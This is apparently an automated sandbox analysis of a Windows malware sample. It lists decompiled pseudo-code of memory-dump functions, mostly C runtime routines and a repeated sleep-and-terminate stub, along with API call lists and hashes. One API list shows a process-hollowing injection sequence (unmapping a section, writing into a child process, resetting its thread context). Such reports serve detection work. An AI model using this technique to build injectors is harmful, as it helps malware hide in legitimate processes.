                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                • String ID:
                • API String ID: 3016257755-0
                • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction ID: acc13cb3f66903cd5af19021ab7f63e6ce0173ce80a6ae777747199e4b011bbd
                • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                • Instruction Fuzzy Hash: 2E11873240014EBBCF125E86DC01CEE3F22BB28354F588826FA19651B0C63BC971AB89
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E0040BE5C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                				signed int _t13;
                				intOrPtr _t27;
                				intOrPtr _t29;
                				void* _t30;
                				void* _t31;
                
                				_t31 = __eflags;
                				_t26 = __edi;
                				_t25 = __edx;
                				_t22 = __ebx;
                				_push(0xc);
                				_push(0x428580);
                				E00407404(__ebx, __edi, __esi);
                				_t29 = E00409336(__ebx, __edx, _t31);
                				_t13 =  *0x42acec; // 0xfffffffe
                				if(( *(_t29 + 0x70) & _t13) == 0) {
                					L6:
                					E00409F79(_t22, _t26, 0xc);
                					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                					_t8 = _t29 + 0x6c; // 0x6c
                					_t27 =  *0x42add0; // 0x42acf8
                					 *((intOrPtr*)(_t30 - 0x1c)) = E0040BE1E(_t8, _t27);
                					 *(_t30 - 4) = 0xfffffffe;
                					E0040BEC6();
                				} else {
                					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                						goto L6;
                					} else {
                						_t29 =  *((intOrPtr*)(E00409336(_t22, __edx, _t33) + 0x6c));
                					}
                				}
                				if(_t29 == 0) {
                					E0040850D(_t25, 0x20);
                				}
                				return E00407449(_t29);
                			}








                0x0040be5c
                0x0040be5c
                0x0040be5c
                0x0040be5c
                0x0040be5c
                0x0040be5e
                0x0040be63
                0x0040be6d
                0x0040be6f
                0x0040be77
                0x0040be9b
                0x0040be9d
                0x0040bea3
                0x0040bea7
                0x0040beaa
                0x0040beb5
                0x0040beb8
                0x0040bebf
                0x0040be79
                0x0040be79
                0x0040be7d
                0x00000000
                0x0040be7f
                0x0040be84
                0x0040be84
                0x0040be7d
                0x0040be89
                0x0040be8d
                0x0040be92
                0x0040be9a

                APIs
                • __getptd.LIBCMT ref: 0040BE68
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 0040BE7F
                • __amsg_exit.LIBCMT ref: 0040BE8D
                • __lock.LIBCMT ref: 0040BE9D
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                • String ID:
                • API String ID: 3521780317-0
                • Opcode ID: 303b6b54ffc088d61ac8b527bf232a5405e04159464000db62d750175085c295
                • Instruction ID: 220dff93fc0e225ca4262bf9140b722410d7ca19c554bdb0cc60d2889c129db6
                • Opcode Fuzzy Hash: 303b6b54ffc088d61ac8b527bf232a5405e04159464000db62d750175085c295
                • Instruction Fuzzy Hash: B0F01231A547009FD631AB76D40378E73A0AF00718F54457FA941B72D2DB7CAD419ADE
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00407253() {
                				intOrPtr _t5;
                				intOrPtr _t6;
                				intOrPtr _t10;
                				void* _t12;
                				intOrPtr _t15;
                				intOrPtr* _t16;
                				signed int _t19;
                				signed int _t20;
                				intOrPtr _t26;
                				intOrPtr _t27;
                
                				_t5 =  *0x66f720;
                				_t26 = 0x14;
                				if(_t5 != 0) {
                					if(_t5 < _t26) {
                						_t5 = _t26;
                						goto L4;
                					}
                				} else {
                					_t5 = 0x200;
                					L4:
                					 *0x66f720 = _t5;
                				}
                				_t6 = E0040BF86(_t5, 4);
                				 *0x66e708 = _t6;
                				if(_t6 != 0) {
                					L8:
                					_t19 = 0;
                					_t15 = 0x42a288;
                					while(1) {
                						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                						_t15 = _t15 + 0x20;
                						_t19 = _t19 + 4;
                						if(_t15 >= 0x42a508) {
                							break;
                						}
                						_t6 =  *0x66e708;
                					}
                					_t27 = 0xfffffffe;
                					_t20 = 0;
                					_t16 = 0x42a298;
                					do {
                						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x66f740 + (_t20 >> 5) * 4))));
                						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                							 *_t16 = _t27;
                						}
                						_t16 = _t16 + 0x20;
                						_t20 = _t20 + 1;
                					} while (_t16 < 0x42a2f8);
                					return 0;
                				} else {
                					 *0x66f720 = _t26;
                					_t6 = E0040BF86(_t26, 4);
                					 *0x66e708 = _t6;
                					if(_t6 != 0) {
                						goto L8;
                					} else {
                						_t12 = 0x1a;
                						return _t12;
                					}
                				}
                			}













                0x00407253
                0x0040725b
                0x0040725e
                0x00407269
                0x0040726b
                0x00000000
                0x0040726b
                0x00407260
                0x00407260
                0x0040726d
                0x0040726d
                0x0040726d
                0x00407275
                0x0040727c
                0x00407283
                0x004072a3
                0x004072a3
                0x004072a5
                0x004072b1
                0x004072b1
                0x004072b4
                0x004072b7
                0x004072c0
                0x00000000
                0x00000000
                0x004072ac
                0x004072ac
                0x004072c4
                0x004072c5
                0x004072c7
                0x004072cd
                0x004072e1
                0x004072e7
                0x004072f1
                0x004072f1
                0x004072f3
                0x004072f6
                0x004072f7
                0x00407303
                0x00407285
                0x00407288
                0x0040728e
                0x00407295
                0x0040729c
                0x00000000
                0x0040729e
                0x004072a0
                0x004072a2
                0x004072a2
                0x0040729c

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __calloc_crt
                • String ID: f
                • API String ID: 3494438863-2991006914
                • Opcode ID: 5b630ee3d2dbdbebf626194c9593dd7727521db8961ea863eba059166b8ee4f8
                • Instruction ID: 5b1c1a8068189c125be6ca11bca271ebadba2b5e15edd28ae59a5051adca66c0
                • Opcode Fuzzy Hash: 5b630ee3d2dbdbebf626194c9593dd7727521db8961ea863eba059166b8ee4f8
                • Instruction Fuzzy Hash: 29110631B0D211ABF7288B2DBC916623782E745728B24527FF500EB3D0E77DE881469E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 86%
                			E00405819(void* __ebx, void* __edi, intOrPtr* __esi) {
                				intOrPtr _t17;
                				void* _t26;
                				intOrPtr* _t28;
                				void* _t29;
                				void* _t30;
                
                				_t28 = __esi;
                				_t19 = __ebx;
                				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                				E00405289(__ebx, __edi, __esi,  *((intOrPtr*)(_t29 - 0x28)));
                				 *((intOrPtr*)(E00409336(__ebx, _t26, _t30) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                				_t17 = E00409336(_t19, _t26, _t30);
                				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                					_t17 =  *((intOrPtr*)(__esi + 0x14));
                					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                						if( *((intOrPtr*)(_t29 - 0x34)) == 0 &&  *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                							_t17 = E00405262( *((intOrPtr*)(_t28 + 0x18)));
                							_t38 = _t17;
                							if(_t17 != 0) {
                								_push( *((intOrPtr*)(_t29 + 0x10)));
                								_push(_t28);
                								return E0040559E(_t38);
                							}
                						}
                					}
                				}
                				return _t17;
                			}








                0x00405819
                0x00405819
                0x0040581c
                0x00405822
                0x00405830
                0x00405836
                0x0040583e
                0x0040584a
                0x00405852
                0x0040585a
                0x0040586e
                0x00405879
                0x0040587f
                0x00405881
                0x00405883
                0x00405886
                0x00000000
                0x0040588d
                0x00405881
                0x0040586e
                0x0040585a
                0x0040588e

                APIs
                  • Part of subcall function 00405289: __getptd.LIBCMT ref: 0040528F
                  • Part of subcall function 00405289: __getptd.LIBCMT ref: 0040529F
                • __getptd.LIBCMT ref: 00405828
                  • Part of subcall function 00409336: __getptd_noexit.LIBCMT ref: 00409339
                  • Part of subcall function 00409336: __amsg_exit.LIBCMT ref: 00409346
                • __getptd.LIBCMT ref: 00405836
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.530438650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.530431935.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530462869.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.530477919.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                Similarity
                • API ID: __getptd$__amsg_exit__getptd_noexit
                • String ID: csm
                • API String ID: 803148776-1018135373
                • Opcode ID: c3afd64fdfd2f2d8d217d39c8847acdcb15bae71fc736d0782f49ac46d94bf0d
                • Instruction ID: 6d7eef5c8a6a22c85478be91105518180ffb2f651ccb154911799a14910a4cc3
                • Opcode Fuzzy Hash: c3afd64fdfd2f2d8d217d39c8847acdcb15bae71fc736d0782f49ac46d94bf0d
                • Instruction Fuzzy Hash: A2010436800A059FCB38AE66C5416AFB3A9EF14315F58843FEC40766E1CB3889A1CE49
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}














                0x0040180c
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}







                0x00401822
                0x00401822
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction ID: 86529ff08739d4d45ab2b2fe3aa627bb4dd9aa569924de5dc1b0fc6937d585b1
                • Opcode Fuzzy Hash: a194699a847889707888bec4c97d3b5ba1a2af2b109fbbf12831e69875d24230
                • Instruction Fuzzy Hash: FEF03133604204EBDB047E96C841ABA36299B44754F24C537BA13B91F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401826(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t8;
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("sbb ebx, ebp");
                				L00401140(_t8, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401826
                0x00401826
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction ID: 61297dcd7f948f961e89af5f5716b1062d194a974c17104e1ab0fce138cf61ec
                • Opcode Fuzzy Hash: 19d43838bd81236491392686aac446d18c030aded37c005789754258c9c8d03d
                • Instruction Fuzzy Hash: C4F04F33604208A7DB04BE96CC41AAA3719AB04754F248537BB13791E1DA3DCB12A72B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 20%
                			E00401834(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t10;
                				void* _t13;
                				intOrPtr* _t19;
                				void* _t22;
                				void* _t25;
                
                				_t26 = __eflags;
                				L00401140(_t10, __ebx, __edi, __esi, __eflags, __fp0);
                				_t19 =  *((intOrPtr*)(_t25 + 8));
                				Sleep(0x1388);
                				_t13 = E00401381(_t22, _t26, _t19,  *((intOrPtr*)(_t25 + 0xc)),  *((intOrPtr*)(_t25 + 0x10)), _t25 - 4); // executed
                				if(_t13 != 0) {
                					_push( *((intOrPtr*)(_t25 + 0x14)));
                					_push( *((intOrPtr*)(_t25 - 4)));
                					_push(_t13);
                					_push(_t19); // executed
                					L00401455(0x60, _t22, __edi); // executed
                				}
                				 *_t19(0xffffffff, 0); // executed
                				_t19 = _t19 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}








                0x00401834
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000001.00000002.570929450.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction ID: 4e4f5f6328981cf1385f7e82c295c95f43d6d852bc8dfc3b1875bfb827a549ac
                • Opcode Fuzzy Hash: 0870dc026937b1eb0e2e38101574af244100116dae67d2ee4212e122303e269f
                • Instruction Fuzzy Hash: BDF04932604208ABDB04BF92CC81ABA3329AB04754F248537BA12790F1D639C612A72B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00820156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0082016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 00820255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00820270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00820283
                • GetThreadContext.KERNELBASE(00000000,?), ref: 0082029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008202C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 008202E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00820304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0082032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00820399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 008203BF
                • SetThreadContext.KERNELBASE(00000000,?), ref: 008203E1
                • ResumeThread.KERNELBASE(00000000), ref: 008203ED
                • ExitProcess.KERNEL32(00000000), ref: 00820412
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 2875986403-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: 401bc510db23d613e968c2a9581edff8438624b0c123ab5150f376b716fe20db
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: 18B1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE81CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00820533
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                • API String ID: 716092398-2341455598
                • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction ID: dcad49dd5519ebfdb274b43ae0a39c3ce43354ab70b5504e234b57bb876a97e1
                • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                • Instruction Fuzzy Hash: 85511A70D08388DEEB11CBD8D949BDDBFB2AF11708F144058E5447F286C3BA5658CBA6
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetFileAttributesA.KERNELBASE(apfHQ), ref: 008205EC
                Strings
                Memory Dump Source
                • Source File: 00000005.00000002.622893352.0000000000820000.00000040.00001000.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                Similarity
                • API ID: AttributesFile
                • String ID: apfHQ$o
                • API String ID: 3188754299-2999369273
                • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction ID: a1c8a9e0b916bd9b36d542a745d89038f5196bf67793f906409db264d460a33f
                • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                • Instruction Fuzzy Hash: EB011E70C0425CEEDF10DBD8D5583AEBFB5AF51309F148099C4096B342D7B69B98CBA2
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 23%
                			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                				char _v8;
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				void* __ebp;
                				void* _t11;
                				void* _t16;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t20;
                				void* _t21;
                
                				_t22 = __eflags;
                				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                				_t17 = _a4;
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                				if(_t11 != 0) {
                					_push(_a16);
                					_push(_v8);
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, _t20); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				return __eax;
                			}














                0x0040180c
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction ID: 439418bc6b8cc85bb90c3f715c5c8777bd26b3ffbf7cafd5698f886abb68661d
                • Opcode Fuzzy Hash: 48605b2c447a37bcbfe7e2e744f1bc94e20697bf77b90fed00f3eac78df6e713
                • Instruction Fuzzy Hash: DA014F73608208E7DB057A968C41ABA36299B04754F24C137BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
                • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                Memory Dump Source
                • Source File: 00000006.00000002.633640295.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                Similarity
                • API ID: ProcessSleepTerminate
                • String ID:
                • API String ID: 417527130-0
                • Opcode ID: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction ID: 3ccd72cbf6c862e7ac88a574d3d4d63140f03618044998c1cc11cf15f2003e8a
                • Opcode Fuzzy Hash: 735c82c96fcbea7bf12158d9a4ead4c90c858f64146e6fe56e595d73795e62df
                • Instruction Fuzzy Hash: F5F03133604204E7DB047E96CC41ABA36199B04754F24C537BA13791F1D63DCB12A76B
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 17%
                			E00401822(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                				void* _t11;
                				intOrPtr* _t17;
                				void* _t19;
                				void* _t22;
                
                				_t23 = __eflags;
                				asm("out 0x95, eax");
                				L00401140(0x183e, __ebx, __edi, __esi, __eflags, __fp0);
                				_t17 =  *((intOrPtr*)(_t22 + 8));
                				Sleep(0x1388);
                				_t11 = E00401381(_t19, _t23, _t17,  *((intOrPtr*)(_t22 + 0xc)),  *((intOrPtr*)(_t22 + 0x10)), _t22 - 4); // executed
                				if(_t11 != 0) {
                					_push( *((intOrPtr*)(_t22 + 0x14)));
                					_push( *((intOrPtr*)(_t22 - 4)));
                					_push(_t11);
                					_push(_t17); // executed
                					L00401455(0x60, _t19, __edi); // executed
                				}
                				 *_t17(0xffffffff, 0); // executed
                				_t17 = _t17 + 0x60;
                				_push(0x60);
                				asm("pushad");
                				__ecx =  *__esp;
                				__esp = __esp + 4;
                				__eax = L00401140(__eax, __ebx, __edi, __esi, __eflags, __fp0);
                				_pop(__edi);
                				_pop(__esi);
                				_pop(__ebx);
                				__esp = __ebp;
                				_pop(__ebp);
                				return __eax;
                			}







                0x00401822
                0x00401822
                0x00401839
                0x0040183e
                0x00401846
                0x00401854
                0x0040185b
                0x0040185d
                0x00401860
                0x00401863
                0x00401864
                0x00401865
                0x00401865
                0x0040186e
                0x0040187a
                0x0040188a
                0x0040188b
                0x0040188c
                0x0040188f
                0x00401899
                0x0040189e
                0x0040189f
                0x004018a0
                0x004018a1
                0x004018a1
                0x004018a2

                APIs
                • Sleep.KERNELBASE(00001388), ref: 00401846
